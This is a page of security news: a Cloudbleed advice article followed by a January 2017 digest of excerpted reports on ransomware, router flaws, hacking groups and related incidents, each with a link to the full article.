A serious security vulnerability within Cloudflare, a security and web optimisation platform used by over five million websites globally, dubbed Cloudbleed, saw millions of websites affected. The security snafu resulted in Clouflare protected sites, including Uber, Fitbit and dating site OkCupid leaking users' personal and sensitive data.

Although Cloudflare and Google, whose Project Zero initiative was responsible for disclosing the security issue, have worked to remove much of the leaked data, it is likely some of it may still remain exposed. However, there are a few simple measures you can take to check if you have been affected by the issue and to ensure that your data is kept safe.

How to check if your data has been affected by Cloudbleed


The first thing you can do to check if you data has been affected by the leak is to check which sites use Cloudflare. Millions of websites use Cloudflare and according to Google Project Zero researcher Tavis Ormandy, an unprecedented portion of the internet is linked to it. "I didn't realise how much of the internet was sitting behind [Cloudflare] until this incident," Ormandy wrote in the report that disclosed the issue.

Users can now check which sites have been affected via a list published on GitHub. Among those listed are Medium, 4chan, Zendesk, London Transport, New York Times and more. According to a report by Motherboard, one can also use the website doesitusecloudflare.com to check if a website was affected by the leak.

How to keep your data safe

Change your passwords! Given the vast portion of the internet that used Cloudflare, it still remains unclear as to how many websites may have been affected by the security issue. Keeping that in mind, the simplest way to keep your data safe would to be to change your passwords, as a precaution. Changing your passwords is also imperative given that researchers believe that the affected sites may have been leaking data for a while before the issue was detected. This means that leaked data may have potentially made its way into the hands of malicious entities.

Security researcher and former Cloudflare employee Ryan Lackey said in a Medium post that "unless it can be shown conclusively that your data was NOT compromised, it would be prudent to act as if it were."

Use a password manager to generate strong passwords


Changing passwords can be a bother, however, when it comes to cybersecurity, the age old adage of "better to be safe than sorry" truly applies. If you are anything like me, coming up with new and strong passwords and keeping a track of all your accounts' passwords could be as challenging as sticking to a healthy diet while staring at a plateful of chips. This is where setting up a password manager can prove to be a lifesaver.

There are various kinds of password manager software available and most of them have been designed to generate strong and unique passwords for different accounts. The bonus is that the software also keeps a track of all your passwords, so you don't have to tax your memory. All you need is one master password to unlock the software and you'll have the rest at the tips of your fingers whenever necessary.

Use two-factor authentication for all your accounts

Most online communications services and messaging apps encourage users to adopt two-factor authentication, which adds an extra layer of security to all your accounts. This can be useful especially in cases like this, when leaked user data could have potentially landed in the hands of hackers. Two-factor authentication serves as a last line of defence against account compromise and it is highly advisable that you activate the feature in all your accounts.

(1st March 2017)


IT SECURITY REVIEW - JANUARY 2017

-----------------------
NETGEAR ROUTERS AT RISK
(Computer World, dated 31st January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3163489/security/easy-to-exploit-authentication-bypass-flaw-puts-netgear-routers-at-risk.html

For the past half-year, Netgear has been working on fixing a serious and easy-to-exploit vulnerability in many of its routers. And it's still not done.

While Netgear has worked to fix the issue, the list of affected router models increased to 30, of which only 20 have firmware fixes available to date. A manual workaround is available for the rest.

The vulnerability was discovered by Simon Kenin, a security researcher at Trustwave, and stems from a faulty password recovery implementation in the firmware of many Netgear routers. It is a variation of an older vulnerability that has been publicly known since 2014, but this new version is actually easier to exploit.

In January 2014, a researcher found that he could trick the web-based management interface of Netgear WNR1000v3 routers to disclose the admin's password. The exploit involved passing a numerical token obtained from one script called unauth.cgi to another called passwordrecovered.cgi. Neither of them required authentication to access.

----------------------

EUROPOL, INTERNATIONAL POLICE FORCES DISRUPT ATM CRIME GANG
(Cisco Continuum, dated 30th January 2017)

Full article [Option 1]:

https://continuum.cisco.com/2017/01/30/europol-international-police-forces-disrupt-atm-crime-gang/

Europol announced earlier this month that the Romanian National Police and the Directorate for Investigating Organised Crimes and Terrorism, with the help of Europol agents, disrupted an international crime ring responsible for ATM attacks that stole millions from various banks.

In a unique attack style that combined both online and physical components, hackers targeted ATM systems using the Tyupkin ATM malware that would manipulate ATM machines and cause them to empty their cash cassettes. According to CSO, the attackers were able to successfully pull off the heists by starting with spear phishing attacks on bank employees, then-once inside the bank's network-moving laterally to infiltrate the ATM network. A mule would then visit a targeted ATM machine and use a combination on the machine's PIN pad to empty its contents. The process is referred to as "jackpotting."

----------------------

FAKE RANSOMWARE ATTACKS ARE TRICKING BUSINESSES INTO PAYING
(Forbes, dated 27th January 2017 author Lee Mathews)

Full article [Option 1]:

www.forbes.com/sites/leemathews/2017/01/27/fake-ransomware-is-tricking-people-into-paying/#439d1804381c

How terrified are people of losing their data to a ransomware infection? So terrified that they'll pay ransoms even when their computers aren't actually infected.

While Spora might be the sophisticated future of ransomware, cybercriminals have also cooked up a much less sophisticated way to earn easy Bitcoins for their wallets. They're just telling people that they've been victimized by ransomware.

There may never have been a network breach of any kind. No phishing emails with malicious JavaScript files. Just a believable threat sent to the right person and a pervasive fear about losing valuable computer data is enough get the job done, according to a new Citrix study.

----------------------
HACKERS ARE BOMBARDING THE BANK OF CANADA WITH CYBER ATTACKS
(Financial Post, dated 26th January 2017 author Claire Brownwell)

Full article [Option 1]:

http://business.financialpost.com/fp-tech-desk/hackers-bombard-the-bank-of-canada-with-cyberattacks?__lsa=25c8-a886

Employees at the Bank of Canada in November 2015 were bombarded with 25,000 similar, innocuous-looking emails.

The messages came in both official languages, politely asking recipients to review an invoice in an attached Microsoft Word document. The document was armed with code that would attempt to install a colourfully named program - putinanalking.exe - carrying malware designed to steal banking credentials.

Thanks to the bank's cybersecurity defences, the vast majority of those emails were filtered out before they reached their intended targets. For the 33 users who did open the emails and attachments, a second layer of the bank's cybersecurity system kicked in, preventing the malware from transmitting any information to the hackers.

The bank's employees, however, were not as reliable. Five of the 33 duped users opened the email and attachment even after the bank sent out a notification specifically warning them not to.
-----------------------
GOOGLE'S BIG CRACKDOWN : 1.7bn BAD ADS AXED
(ZDNET, dated 26th January 2017 author Liam Tung)

Full article [Option 1]:

www.zdnet.com/article/googles-big-crackdown-1-7-billion-bad-ads-axed-plus-bans-for-200-fake-news-sites/

Google has released its 2016 Bad Ads report, to show how serious it is about combating deviants who abuse its massive ad network, from fraudulent advertisers to phony news sites.

The company says it axed 1.7 billion bad ads in 2016, just over double the 780 million it took down in 2015 for violating its various policies.

Last year Google upgraded its automated systems, which helped it detect and disable 112 million ads designed to trick users, up 600 percent on last year. It also took down 68 million ads that violated its healthcare rules, 17 million illegal gambling ads, and 80 million misleading, shocking and deceptive ads.

-----------------------
RUSSIAN HACKER HAD ACCESS TO A UK TELEVISION STATION FOR ALMOST A YEAR
(International Business Times, dated 26th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/russia-linked-fancy-bear-hackers-had-access-uk-television-station-almost-year-1603226

The same hacking group that targeted the US political system in the run-up to the country's presidential election last year was able to infiltrate the computer systems of a UK television network for almost a year, security experts have revealed.

The network has not been named for legal reasons, and likely due to the strict non-disclosure agreements surrounding breach probes. Yet analysts from SecureWorks, a cybersecurity firm, say hackers gained access in July 2015 and remained undetected for up to 12 months.

----------------------
GMAIL WILL BLOCK JAVASCRIPT ATTACHMENTS, A COMMON SOURCE OF MALWARE
(Computer World, dated 26th January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3161898/security/gmail-will-block-javascript-attachments-a-common-source-of-malware.html

Starting Feb. 13, Google will no longer allow JavaScript attachments on its Gmail service, killing one of the main methods of malware distribution over the past two years.

Users will no longer be able to attach .JS files to emails in Gmail, regardless of whether they attach them directly or they include them in archives like .gz, .bz2, .zip or .tgz. For those rare cases when such files need to be shared via email, users can upload them to a storage service like Google Drive and then share the link.

The .JS file extension will be added an existing list of other banned file attachments that includes: .ADE, .ADP, .BAT, .CHM, .CMD, .COM, .CPL, .EXE, .HTA, .INS, .ISP, .JAR, .JSE, .LIB, .LNK, .MDE, .MSC, .MSP, .MST, .PIF, .SCR, .SCT, .SHB, .SYS, .VB, .VBE, .VBS, .VXD, .WSC, .WSF and .WSH. Most of these file types have long been abused by cybercriminals to send malware via email.

----------------------
CHROME AND FIREFOX WILL WARN USERS ABOUT SENDING SENSITIVE DATA OVER INSECURE CONNECTIONS
(The Verge, dated 26th January 2017 author James Vincent)

Full article [Option 1]:

www.theverge.com/2017/1/26/14396130/http-https-insecure-connections-chrome-firefox

Google and Mozilla are taking new steps to warn internet users about websites vulnerable to hacking. In the latest updates to the Chrome and Firefox web browsers (versions 56 and 51 respectively), users will be told if they're submitting sensitive information over insecure HTTP connections - rather than the safer HTTPS protocol. These warnings have already been deployed in beta versions of the browsers, but their move to the primary version will reach a great number of users.

----------------------
RUSSIA ARRESTS KASPERSKY CYBERCRIME HUNTER IN "TREASON PROBE"
(Forbes, dated 25th January 2017 author Thomas Fox-Brewster)

Full article [Option 1]:

www.forbes.com/sites/thomasbrewster/2017/01/25/russia-kaspersky-treason-arrest/#302d9aef4a68

One of Russia's most successful cybercrime investigators and hacker hunter at one of the world's biggest security companies, Kaspersky Lab, has been arrested by Russian law enforcement as part of a probe into possible treason, according to reports. Kaspersky has confirmed incident response chief Ruslan Stoyanov was at the center of an investigation, but could not offer more details.

"This case is not related to Kaspersky Lab. Ruslan Stoyanov is under investigation for a period predating his employment at Kaspersky Lab," a Kaspersky spokesperson said in an emailed statement. "We do not possess details of the investigation. The work of Kaspersky Lab's Computer Incidents Investigation Team is unaffected by these developments."

----------------------
CYBER CRIMINALS AVOID FRAUD WITHIN THEIR OWN RANKS WITH NEW SITE
(Computer World, dated 24th January 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3161007/security/cyber-criminals-avoid-fraud-within-their-own-ranks-with-new-site.html

Sometimes it's not easy being a cyber criminal. In addition to law enforcement and private security companies, cyber thieves have to battle fraudsters out to beat them at their own game, but a website offers to help.

Ripper.cc has been maintaining a database of known "rippers" or scammers since June last year and security firm Digital Shadows, which has been investigating it, says it may help online black markets flourish.

Fraud is a nagging problem in the cyber criminal world, according to Digital Shadows. Although some hackers believe in honor amongst thieves, others are peddling bogus goods, such as stolen credit card numbers or user credentials that turn out to be fake.

The cost of doing business in this risky climate means hackers are saddled with a "ripper tax," Digital Shadows said in a Tuesday blog post. "This in turn, slows the market down and makes further cyberattacks less lucrative."

----------------------
MICROSOFT TO REPLACE WINDOW DEFENDER SECURITY CENTER IN APRIL
(Computer World, dated 24th January 2017 author Andy Patrizio ?)

Full article [Option 1]:

http://www.computerworld.com/article/3161069/security/microsoft-to-release-windows-defender-security-center-in-april.html

Microsoft has announced that as part of the Creator's Update coming in April, it will introduce a new security service called Windows Defender Security Center, which is designed to act as a dashboard for all of your security features, including third-party security. The Security Center is already available to Windows Insiders using preview builds of Windows 10.

Though Windows Defender has never been a top-flight performer in detecting malware compared to vendors like Trend Micro and Kaspersky (see the latest AV Comparatives in PDF format), Microsoft has stuck with it, and it does make for a decent second line of defense. With the Security Center, Microsoft is expanding beyond mere malware detection into overall system security.
----------------------
ST. LOUIS PUBLIC LIBRARY COMPUTERS HACKED FOR RANSOM
(CNN TECH, dated 19th January 2017 author Jose Pagliery)

Full article [Option 1]:

http://money.cnn.com/2017/01/19/technology/st-louis-public-library-hack/

Hackers have infected every public computer in the St. Louis Public Library system, stopping all book borrowing and cutting off internet access to those who rely on it for computers.

The computer system was hit by ransomware, a particularly nasty type of computer virus that encrypts computer files.

This form of attack renders computers unusable -- unless victims are willing to pay an extortion fee and obtain a key to unlock the machines.

According to the library, hackers demanded $35,000 in the electronic currency Bitcoin -- but the library refuses to pay. Instead, it'll wipe the entire computer system and reset it, which could take days or weeks.

The cyberattack hit 700 computers at all of the city's 16 library branches, according to spokeswoman Jen Hatton.

The entire checkout system is on hold. No one can walk out with any of the library's 4 million books, magazines and videos. And all computers are frozen, she said.

-----------------------
SPANISH POLICE NAB SUSPECT BEHIND NEVERQUEST BANKING MALWARE
(Computer World, dated 20th January 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3160025/security/spanish-police-nab-suspect-behind-neverquest-banking-malware.html

Spanish police have arrested a Russian programmer suspected of developing the Neverquest banking Trojan, a malware targeting financial institutions across the world.

The 32-year-old Russian citizen known as Lisov SV was arrested at the Barcelona airport, Spain's law enforcement agency Guardia Civil said on Friday.

The FBI had been working with Spanish authorities to track down the suspect through an international arrest warrant, according to a statement from the agency. The FBI, however, declined to comment on the man's arrest.

Neverquest is designed to steal username and password information from banking customers. Once it infects a PC, the malware can do this by injecting fake online forms into legitimate banking websites to log any information typed in. It can also take screenshots and video from the PC's desktop and steal any passwords stored locally.

-----------------------
CHINESE INVESTORS GOBBLE UP OWNER OF COMPUTER WORLD, PCWORLD, MACWORLD ETC
(The Register, dated 20th January 2017 author Chris Mellor)

Full article [Option 1]:

www.theregister.co.uk/2017/01/20/idgs_chinese_child_partnering_to_buy_parent/

Two Chinese investors are buying the owner of PCWorld magazine and the IDC market research outfit - International Data Group (IDG) - but IDC's high-performance computing research businesses are not included in the sale.

The two Chinese investors are China Oceanwide Holdings Group Co, Ltd and the confusingly named IDG Capital. They were apparently bidding separately several months ago, but joined forces under the encouragement of Goldman Sachs, IGC's banker.

They are paying a sum estimated between $500m and $1bn. The American Committee on Foreign Investment in the United States (CFIUS) has cleared the sale, which should complete by April.

IDG claims it is the number one tech media group in the world, with operations in 97 countries. Its media brands include CIO, Computerworld, PCWorld, Macworld and more with a zillion associated events, such as CIO round tables and perspectives. It is headquartered in Boston and was founded by Pat McGovern in 1964, and who died in 2014. McGovern made 130 trips to China during his career.

----------------------

RANSOMWARE SCUM INFECT CANCER NON-PROFIT ORGANISATION
(The register, dated 18th January 2017 author Team Register)

Full article [Option 1]:

www.theregister.co.uk/2017/01/18/ransomware_scum_infect_cancer_nonprofit/

Ransomware scum have hit a new low by infecting a not-for-profit cancer support organization in Muncie, Indianapolis, US.

Little Red Door provides diagnostics, treatment, and supplies to under-served patients, among other services. It told told the Associated Press this week that miscreants infected its central server, stripped and encrypted data, and demanded a steep 50 Bitcoin (US$44,000) payment.

Executive director Aimee Fant says the lion's share of the agency's data was located in unspecified cloud storage. She says the agency will be forced to take the hit and not pay the ransom since its funds are supposed to help cancer patients and their families.

The agency plans to replace the affected server with a "secure cloud-based" system and hopes to be back up and running by the week's end. It did not ask for volunteer assistance.

----------------------
MAC MALWARE USES "TRULY ANTIQUE" METHODS TO CONDUCT ESPIONAGE ON SCIENTIFIC FACILITIES
(International Business Times, dated 19th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/mac-malware-uses-truly-antique-methods-conduct-espionage-scientific-facilities-1602035

A strain of malware targeting Apple Mac computers, the first of its kind found in 2017, has been found to use an "ancient" code to spy on biomedical research facilities. Known as Quimitchin, evidence suggests it has been in existence undetected for a number of years.

On the surface the malware seems simplistic, but researcher Thomas Reed said it is only likely to have stayed under the radar for so long because it was being used in what he called "very tightly targeted attacks". In a blog post, he said that it was unlike anything he had seen before.

Quimitchin is designed to take screenshots of an infected computer system and gain access to the webcam functionality. It can also be used by an attacker to simulate mouse clicks and key presses, and to change the position of a computer cursor.

However, what makes this Mac malware stand out is that it uses some "truly antique" methods to carry out these commands, with some functions dating back to "pre-OSX" days and one piece using a piece of open-source code last updated in 1998.

-----------------------
HACKER GROUP THAT PULLED OFF BILLION DOLLAR BANK JOB NOW USING GOOGLE SERVICES FOR MALWARE MONITORING
(International Business Times, dated 19th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hacker-group-that-pulled-off-billion-dollar-bank-job-using-google-services-malware-monitoring-1601879

An organised cybercrime syndicate, which was believed to be responsible for pulling off one of the biggest cyberheists in 2015, is now reportedly using Google services for its malware monitoring purposes. Security researchers believe that the Carbanak gang, named after their customised malware, has taken to using Google services to issue its command and control (C&C) communication, in efforts to better track and control its current and potential victims.

The Carbanak hacker group, also known as Anunak, is believed to have been operational since 2013. However, it was only in 2015 that the group's activities came to light, after the cybercriminals used their Trojan malware to launch targeted attacks against global banks, making away with an estimated $1bn.

---------------------
CYBER FRAUDSTERS USE SOCIAL MEDIA TO TRICK UK COMPANIES INTO DONATING TO SHAM SYRIA MIGRANT APPEAL
(International Business Times, dated 17th January 2017 author William Watkinson)
Full article [Option 1]:

www.ibtimes.co.uk/cyber-fraudsters-use-social-media-trick-uk-companies-into-donating-sham-syrian-migrant-appeal-1601605

Cyber fraudsters have been using social media and emails to trick British companies and members of the public into donating to a sham charity appeal that claimed to help Syrian migrants. On Tuesday (17 January) the UK's charity regulator, the Charity Commission, issued an alert to the public and businesses to raise awareness of phishing emails containing bogus charity appeals .

The commission said that fraudsters sent emails purporting to be from a genuine charity named as the Migrant Helpline. Although the charity is in no way linked to the fraud, the emails purportedly from them carried a link containing malware to steal banking details, the Charity Commission said.

-----------------------
RANSOMWARE BRUTES ATTACKED 1 IN 3 NHS TRUSTS LAST YEAR
(The Register, dated 17th January 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/01/17/nhs_ransomware/

A third (30 per cent) of NHS trusts have been infected by ransomware, with one - the Imperial College Healthcare in London - suffering 19 attacks in just 12 months.

According to results of a Freedom of Information-based study, none of the trusts reported paying a ransom or informed law enforcement. All preferred to deal with the attacks internally.

Additionally, of the 15 trusts who were able to provide further information about the origin of the attacks, 87 per cent reported that the attacker gained access through a networked NHS device, with 80 per cent targeted by a phishing scheme.

The figures are based on a Freedom of Information request from cyber security firm SentinelOne, which received responses from 94 of the 129 trusts quizzed.

Ransomware, which encrypts data on compromised devices before demanding a ransom to regain access, has affected a number of hospitals worldwide over recent months. For example, the Hollywood Presbyterian Medical Center in Los Angeles paid cybercriminals £12,000 last February after being infected by Locky, one of the most prolific ransomware variants.

-----------------------
LOCKY MALWARE ATTACKS TO RETURN WITH A VENGEANCE
(International Business Times, dated 17th January 2017)

Full article [Option 1]:

www.ibtimes.co.uk/locky-malware-attacks-return-vengeance-experts-warn-1601551

Everyone likes a break over Christmas and the New Year - even malware developers firmly committed a life of cybercrime. That's according to multiple cybersecurity firms, each warning that a recent lull in global malware circulation is unlikely to last for much longer.

One strain of ransomware called Locky - which infects victims via malicious spam links and can hold entire computer networks to ransom - all but disappeared over the Christmas period, with an 81% decrease in overall activity in the space of a week, experts have revealed.

US-based cybersecurity firm Checkpoint said global malware attacks fell by 8% in December compared with stats from the month previous. Meanwhile, Cisco's Talos expert Jaeson Schultz revealed how use of the 'Necurs' botnet also significantly decreased.

In any case, the researchers are now telling the public not to expect the relative calm to continue. "We expect attack volumes to bounce back in January," Checkpoint has warned in new a blog post.

-----------------------
FRANCE GEARS UP FOR 2017 ELECTIONS BY SETTING UP DEFENCES AGAINST CYBERATTACKS
(International Business Times, dated 17th January 2017 author India Ashok)

Full article [Option 1]

www.ibtimes.co.uk/france-gears-2017-elections-by-setting-defences-against-cyberattacks-1601403

France is just months away from its presidential elections and concerns over election hacking appear to be increasingly at the forefront. Following recent allegations of Russia interfering in the 2016 US presidential election, European countries have ramped up cyber defences. France too is setting up measures to deter and counter potential cyberattacks targeting its election in May, according to reports.

France's National Security Agency for the Security of Information Systems (L'Agence nationale de la sécurité des systèmes d'informationor ANSSI) has been tasked to provide support and advice to French political parties.

------------------------
OUTAGE-HIT LLOYDS BANK IN TALKS TO OUTSOURCE DATA CENTRES TO IBM
(The Register, dated 13th January 2017 author Paul Kunert)

Full article [Option 1]: www.theregister.co.uk/2017/01/13/lloyds_bank_in_talks_to_outsource_bit_barns_to_ibm/

In the week that Lloyds Banking Group suffered multiple outages, it has emerged the UK financial giant is negotiating to outsource management of its bit barns (data centres) to IBM Global Business Services.

Online services were interrupted on Wednesday and Thursday by unspecified technical glitches that prevented people from logging into their accounts, a problem that again flared up over lunchtime today.

Multiple sources told us about the talks with Big Blue - which started some months ago - though there is no certainty an agreement will be reached.

"IBM is having conversations with Lloyds about a massive buyback of their estate," said a person familiar with the matter, adding: "Lloyds will reverse management and the estate and maybe get some cash in the process."

Under the deal, IBM would pay for the data centre assets, transfer them to its balance sheet, and then charge Lloyds for the ongoing management.

-----------------------
HOW RUSSIA HACKS : FIREEYE ANALYSIS EXPOSES MAIN TACTICS USED BY "FANCY BEAR"
(International Business Times, dated 12th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/how-russia-hacks-fireeye-analysis-exposes-main-tactics-used-by-fancy-bear-1600768

Last December the US Intelligence Community (IC) released a report naming APT28, a suspected Russian hacking group, as being linked to numerous cyberattacks designed to influence the outcome of the 2016 presidential election with a mixture of leaks and misinformation.

Highlighting Russian "malicious cyber activity" the IC's analysis reported on this "advanced persistent threat" by confirming it was likely linked to the county's military or intelligence services. The hackers go by many names: Fancy Bear, Pawn Storm, Sofacy, Sednit, Tsar Team and more.

The group - after targeting the Democratic National Committee (DNC), the World Anti-Doping Agency (Wada) and the German government - is the focus of a new report from US-based cybersecurity firm FireEye, discussing the key hacking techniques it uses.

----------------------
MALWARE DUBBED NUKE PUT UP FOR SALE ON DARK WEB BY ALLEGED RUSSIAN HACKER
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/malware-dubbed-nuke-put-sale-dark-web-by-alleged-russian-hacker-1600438

Security researchers have uncovered a new malware strain, dubbed Nuke, put up for sale on the dark web by an alleged Russian cybercriminal going by the pseudonym Gosya. Researchers noted that the malware comes with several features, including "bot killer" abilities, which allows it to remove all competing malware from an infected machine.

According to researchers at cybersecurity firm Sixgill, which specialises in detecting and defusing cyberattacks and data leaks originating from the dark web, the Nuke malware comes with Chrome and Firefox code injecting abilities. It fully supports 32-bit and 64-bit systems alike and is also capable of bypassing UAC and Windows Firewall executions.

-----------------------
BROTHER - SISTER DUO ACCUSED OF HACKING ITALY'S ELITE, INCLUDING FORMER PMs, A VATICAN CARDINAL AND BANKERS
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/brother-sister-duo-accused-hacking-italys-elite-including-former-pms-vatican-cardinal-bankers-1600401

A brother-sister hacker duo has been arrested by Italian police for developing a customised malware and hacking into email accounts of Italy's elite. Giulio Occhionero, 45, a nuclear engineer, and his sister Francesca Maria Occhionero, 48, both of whom reside in Rome, have been charged with launching a massive cyberespionage campaign that targeted two former Italian prime ministers, a Vatican cardinal, the president of the European Central Bank and thousands of others, according to reports.

The hackers, who also have residency in the UK, but were believed to have been residing in Rome in the recent past, were charged with hacking and stealing state secrets. The siblings have been accused of hacking at least 18,000 email accounts, which belonged to Italian businessmen, bankers, and politicians, including former prime ministers Matteo Renzi and Mario Monti.

-----------------------
GERMAN SPY CHIEF WANTS TO HIT BACK AT HACKERS AMID INCREASING CYBERTHREATS
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/german-spy-chief-wants-hit-back-hackers-amid-increasing-cyberthreats-1600371

Hans-Georg Maassen, Germany's domestic intelligence agency chief, reportedly said that German intelligence agencies need to do more than just protect and defend the county's digital infrastructure. He called for intelligence agencies to counter cyberattacks launched by hackers and cyber-enemies, according to a report.

"We think it's essential that we don't just act defensively, but that we are also able to attack the enemy so that he stops continuing to attack us in the future," Maassen, president of the Federal Office for the Protection of the Constitution (BfV), told the German news agency dpa, the Guardian reported.

According to reports, recent attacks, both in cyberspace and in the real world have triggered concerns about the competence and abilities of German intelligence agencies as well as police forces, in their ability to respond and mitigate attacks.

Maassen lamented that his agency was not authorised to delete files that had been accessed or stolen by hackers and stored on external servers. "Thus we have a high risk that the damage will increase, because third parties as well as the culprit can access the data," he said.

----------------------
DATABASE RANSOM ATTACKS SOAR, BODY COUNT HITS 27,000 IN HOURS
(The Register, dated 9th January 2017 author Darren Pauli)

Full article [Option 1]: www.theregister.co.uk/2017/01/09/mongodb/

MongoDB databases are being decimated in soaring ransomware attacks that have seen the number of compromised systems more than double to 27,000 in a day.

Criminals are accessing, copying and deleting data from unpatched or badly-configured databases.

Administrators are being charged ransoms to have data returned. Initial attacks saw ransoms of 0.2 bitcoins (US$184) to attacker harak1r1, of which 22 victims appeared to have paid, up from 16 on Wednesday when the attacks were first reported.

----------------------
RANSOMWARE SLEAVEBALLS TARGET UK SCHOOLS
(The Register, dated 6th January 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/01/06/ransomware_crooks_target_schools/

Cybercrooks are targeting UK schools, demanding payments of up to £8,000 to unlock data they have encrypted with malware.

Action Fraud warns that fraudsters are cold-calling schools claiming to be from the Department of Education and asking for the head teachers' email addresses. Crooks then send booby-trapped emails with infectious zip attachments supposedly containing sensitive information.

In reality, these files carry file-encrypting ransomware. Action Fraud is urging educational establishments to be vigilant.

Andrew Stuart, managing director of backup and disaster recovery vendor Datto, commented: "Unscrupulous hackers see ransomware as a business, and have already been known to exploit hospitals and even charities, so schools were always possible targets.

"It is vital that schools review their data backup procedures to ensure that they not only have copies of all critical data, but can restore their data smoothly in the event of a ransomware incident."

----------------------
D-LINK ROUTERS AND IoT CAMERAS COULD GIVE HACKERS EASY ACCESS TO LIVE VIDEO AND AUDIO
(International Business Times, dated 6th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/d-link-routers-iot-cameras-could-give-hackers-easy-access-live-video-audio-1599712

The US Federal Trade Commission (FTC) has filed a legal complaint against Taiwan-based networking firm D-Link and its US subsidiary, claiming that "inadequate" cybersecurity measures leave users of its wireless routers and web-connected cameras at risk of hacking.

The complaint, filed in a Californian District court, details how the FTC believes D-Link has neglected the security of its internet-of-things (IoT) product range, a move it alleged could leave both consumer privacy - and personal information - wide open to compromise.

The firm's routers and Internet Protocol (IP) cameras could potentially leak sensitive consumer data, including live video and audio feeds from D-Link IP cameras, the US watchdog said.

----------------------
PETYA RANSOMWARE VARIANT GOLDENEYE TARGETS HR DEPARTMENTS BY SENDING FAKE JOB APPLICATIONS
(International Business Times, dated 6th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/petya-ransomware-variant-goldeneye-targets-hr-departments-by-sending-fake-job-applications-1599659

Cybercriminals have become increasingly skilled at modifying and customising malware in efforts to ensure that targeted victims are reeled in successfully by a malicious campaign. Ransomware authors in particular are now increasingly developing ransomware strains designed to target a specific victim pool. A new variant of the prolific Petya ransomware has been spotted, specifically targeting HR departments, by sending in fake job applications.

The applications are designed to look legitimate and come with a malware-laced attachment, which when opened, infects the victim's system and encrypts all data. The applications are sent via email and include two attachments: one which poses as a cover letter and acts as a lure to victims and the other, an Excel file that contains malicious macros.

According to Check Point security researchers, GoldenEye ransomware targets firms' HR "due to the fact they usually cannot avoid opening emails and attachments from strangers, a common malware infection method".

-----------------------
FIRECRYPT RANSOMEWARE EMERGES WITH DDoS LAUNCHING CAPABILITIES
(International Business Times, 5th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/firecrypt-ransomware-emerges-ddos-launching-capabilities-1599460

A new ransomware strain uncovered by security researchers, dubbed FireCrypt, reportedly comes with features which allow the ransomware to launch relatively small-scale DDoS attacks. FireCrypt was found to share several similarities with a previously uncovered ransomware strain called Deadly for a Good Purpose, indicating that the two may be linked, according to a report.

As is usual, once victims' files have been encrypted, the ransomware serves up a ransom note. FileCrypt's authors are currently believed to be demanding $500 (£406) in bitcoins from their victims.

There currently appears to be no known way to recover files encrypted by the FileCrypt ransomware. However, reports speculate that a decrypter may soon be made public.

-----------------------
ANDROID TOPS 2016 VULNERABILITIES LIST
(The Register, dated 3rd January 2017 author Richard Chirgwin)

Full article [Option 1]:

www.theregister.co.uk/2017/01/03/android_tops_2016_vuln_list_with_523_bugs/

Background (uaware): The MITRE Corporation is a not-for-profit US company that operates multiple federally funded research and development centre's. Common Vulnerabilities and Exposures (CVE) are recorded problems that require a fix / patch to a piece of software to prevent security issues, for example.

Of any single product, CVE Details reckons, Android had the most reported vulnerabilities in 2016 - but as a vendor, Adobe still tops the list.

The analysis is limited by the fact that only vulnerabilities passing through Mitre's Common Vulnerabilities and Exposures (CVE) database are counted. That's a statistically worthwhile dataset, however, since 10,098 bugs were assigned numbers during 2016.

Top of the vulnerabilities (Operating Systems / Programs)

1. Android : 523
2. Debian Linux : 319
3. Ubuntu Linux : 278
4. Adobe Flash : 266

Even so, with 523 vulnerabilities landing a CVE number in 2016, Android carried nearly double the patch-load of Adobe Flash. Many of the CVEs attributed to those OSs will be inherited from third party packages included in the distributions.

Top of the vulnerabilities (Venders) :

1. Adobe : 1,383
2. Microsoft : 1,325
3. Google : 695
4. Apple : 611

----------------------

NEW ANDROID-INFECTING MALWARE HIJACKS ROUTERS
(The Register, dated 3rd January 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/

Hackers have brewed up a strain of Android malware that uses compromised smartphones as conduits to attack routers.

The Switcher trojan does not attack Android device users directly. Instead, the malware uses compromised smartphones and tablets as tools to attack any wireless networks they connect to.

Switcher brute-forces access to the network's router and then changes its DNS settings to redirect traffic from devices connected to the network to a rogue DNS server, security researchers at Kaspersky Lab report.

This server fools the devices into communicating with websites controlled by the attackers, leaving users wide open to either phishing or further malware-based attacks.

----------------------
RANSOMWARE ARRIVES ON SMART TVs
(Computer World, dated 3rd January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3153953/security/ransomware-arrives-on-smart-tvs.html

It took a year from proof of concept to in-the-wild attack, but ransomware for Android-based smart TVs is now here. As one victim discovered this Christmas, figuring out how to clean such an infection can be quite difficult.

Ransomware for Android phones has already been around for several years and security experts have warned in the past that it's only a matter of time until such malicious programs start affecting smart TVs, especially since some of them also run Android.

In November 2015, a Symantec researcher named Candid Wueest even went as far as to infect his own TV with an Android ransomware application to highlight the threat. While that infection was just a demonstration, this Christmas, the owner of an LG Electronics TV experienced the real deal.
----------------------

(4th February 2017)



IT SECURITY REVIEW - DECEMBER 2016

----------------------
TOP 5 HACKER GROUPS THAT MADE THE INTERNET A BATTLEGROUND IN 2016
(International Business Times, dated 31st December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/top-5-hacker-groups-that-wreaked-havoc-2016-1598789

